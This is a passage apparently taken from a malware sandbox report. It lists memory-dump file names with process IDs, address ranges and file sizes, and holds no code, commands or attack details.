10.8MB
-
memory/1272-187-0x000000001AE70000-0x000000001AE72000-memory.dmpFilesize
8KB
-
memory/1272-179-0x00000000000E0000-0x000000000011E000-memory.dmpFilesize
248KB
-
memory/1344-253-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1344-254-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1344-252-0x0000000140000000-0x0000000140786000-memory.dmpFilesize
7.5MB
-
memory/1504-176-0x0000000000B92000-0x0000000000BF6000-memory.dmpFilesize
400KB
-
memory/1504-212-0x0000000000B92000-0x0000000000BF6000-memory.dmpFilesize
400KB
-
memory/1504-213-0x0000000000A20000-0x0000000000ABD000-memory.dmpFilesize
628KB
-
memory/1504-214-0x0000000000400000-0x00000000008EC000-memory.dmpFilesize
4.9MB
-
memory/1548-242-0x0000000075150000-0x0000000075900000-memory.dmpFilesize
7.7MB
-
memory/1548-243-0x0000000005680000-0x0000000005C98000-memory.dmpFilesize
6.1MB
-
memory/1548-245-0x0000000005960000-0x0000000005A6A000-memory.dmpFilesize
1.0MB
-
memory/1548-241-0x00000000056C0000-0x00000000056FC000-memory.dmpFilesize
240KB
-
memory/1548-239-0x0000000005CA0000-0x00000000062B8000-memory.dmpFilesize
6.1MB
-
memory/1548-240-0x0000000001E00000-0x0000000001E12000-memory.dmpFilesize
72KB
-
memory/1548-234-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/1680-156-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/1680-154-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/1680-185-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1680-149-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1680-184-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/1680-183-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1680-150-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1680-151-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1680-148-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1680-152-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1680-160-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/1680-153-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/1680-186-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/1680-155-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/1680-158-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/1680-157-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/1680-181-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/1680-147-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/1680-159-0x0000000000400000-0x000000000051E000-memory.dmpFilesize
1.1MB
-
memory/2132-364-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/2132-363-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/2132-357-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/2232-344-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/3464-216-0x00000000048D0000-0x0000000004946000-memory.dmpFilesize
472KB
-
memory/3464-209-0x0000000075150000-0x0000000075900000-memory.dmpFilesize
7.7MB
-
memory/3464-206-0x0000000000070000-0x00000000000FA000-memory.dmpFilesize
552KB
-
memory/3464-215-0x00000000049C0000-0x00000000049C1000-memory.dmpFilesize
4KB
-
memory/3464-220-0x00000000048B0000-0x00000000048CE000-memory.dmpFilesize
120KB
-
memory/3476-256-0x00007FF839570000-0x00007FF839571000-memory.dmpFilesize
4KB
-
memory/3584-233-0x00007FF819CD0000-0x00007FF81A791000-memory.dmpFilesize
10.8MB
-
memory/3584-246-0x0000000003540000-0x0000000003542000-memory.dmpFilesize
8KB
-
memory/4748-182-0x0000000000770000-0x0000000000842000-memory.dmpFilesize
840KB
-
memory/4748-191-0x0000000073C10000-0x00000000743C0000-memory.dmpFilesize
7.7MB
-
memory/4756-178-0x00000000006A0000-0x00000000006A8000-memory.dmpFilesize
32KB
-
memory/4756-189-0x00007FF819CD0000-0x00007FF81A791000-memory.dmpFilesize
10.8MB
-
memory/4756-190-0x000000001C030000-0x000000001C032000-memory.dmpFilesize
8KB
-
memory/4792-210-0x00000000009B2000-0x00000000009BB000-memory.dmpFilesize
36KB
-
memory/4792-177-0x00000000009B2000-0x00000000009BB000-memory.dmpFilesize
36KB
-
memory/4792-217-0x0000000000400000-0x0000000000891000-memory.dmpFilesize
4.6MB
-
memory/4792-211-0x0000000000030000-0x0000000000039000-memory.dmpFilesize
36KB
-
memory/4816-372-0x0000000010000000-0x0000000010D56000-memory.dmpFilesize
13.3MB
-
memory/5320-301-0x00000000005CD000-0x00000000005F4000-memory.dmpFilesize
156KB
-
memory/5332-273-0x00000000000E0000-0x0000000000106000-memory.dmpFilesize
152KB
-
memory/5332-285-0x00007FF819CD0000-0x00007FF81A791000-memory.dmpFilesize
10.8MB
-
memory/5344-286-0x0000000005200000-0x00000000057A4000-memory.dmpFilesize
5.6MB
-
memory/5344-276-0x0000000004AD0000-0x0000000004B46000-memory.dmpFilesize
472KB
-
memory/5344-272-0x0000000075150000-0x0000000075900000-memory.dmpFilesize
7.7MB
-
memory/5344-271-0x0000000000330000-0x0000000000382000-memory.dmpFilesize
328KB
-
memory/5372-280-0x00000000007F8000-0x0000000000848000-memory.dmpFilesize
320KB
-
memory/5416-274-0x00007FF819CD0000-0x00007FF81A791000-memory.dmpFilesize
10.8MB
-
memory/5416-275-0x0000000000110000-0x0000000000140000-memory.dmpFilesize
192KB
-
memory/5424-365-0x0000000000400000-0x000000000063D000-memory.dmpFilesize
2.2MB
-
memory/5472-283-0x0000000077480000-0x0000000077695000-memory.dmpFilesize
2.1MB
-
memory/5472-296-0x0000000002350000-0x0000000002351000-memory.dmpFilesize
4KB
-
memory/5472-290-0x0000000000210000-0x0000000000384000-memory.dmpFilesize
1.5MB
-
memory/5472-292-0x0000000075150000-0x0000000075900000-memory.dmpFilesize
7.7MB
-
memory/5472-279-0x0000000002330000-0x0000000002331000-memory.dmpFilesize
4KB
-
memory/5472-287-0x0000000000210000-0x0000000000384000-memory.dmpFilesize
1.5MB
-
memory/5472-281-0x0000000000210000-0x0000000000384000-memory.dmpFilesize
1.5MB
-
memory/5472-298-0x00000000776E0000-0x0000000077C93000-memory.dmpFilesize
5.7MB
-
memory/5472-278-0x0000000000210000-0x0000000000384000-memory.dmpFilesize
1.5MB
-
memory/5472-291-0x0000000074F50000-0x0000000074FD9000-memory.dmpFilesize
548KB
-
memory/5472-310-0x00000000711A0000-0x00000000711EC000-memory.dmpFilesize
304KB
-
memory/5472-295-0x00000000050C0000-0x00000000050C1000-memory.dmpFilesize
4KB
-
memory/5480-293-0x0000000002440000-0x00000000024A0000-memory.dmpFilesize
384KB
-
memory/5480-299-0x0000000002740000-0x0000000002741000-memory.dmpFilesize
4KB
-
memory/5596-282-0x0000000000658000-0x00000000006C4000-memory.dmpFilesize
432KB
-
memory/5744-288-0x0000000000818000-0x0000000000826000-memory.dmpFilesize
56KB
-
memory/5788-297-0x0000000000860000-0x00000000008C0000-memory.dmpFilesize
384KB
-
memory/5796-289-0x0000000075150000-0x0000000075900000-memory.dmpFilesize
7.7MB
-
memory/5796-294-0x00000000059B0000-0x00000000059B1000-memory.dmpFilesize
4KB
-
memory/5796-284-0x0000000000F30000-0x0000000000F48000-memory.dmpFilesize
96KB
-
memory/5964-305-0x0000000000400000-0x0000000000420000-memory.dmpFilesize
128KB
-
memory/7016-397-0x0000000000705000-0x0000000000712000-memory.dmpFilesize
52KB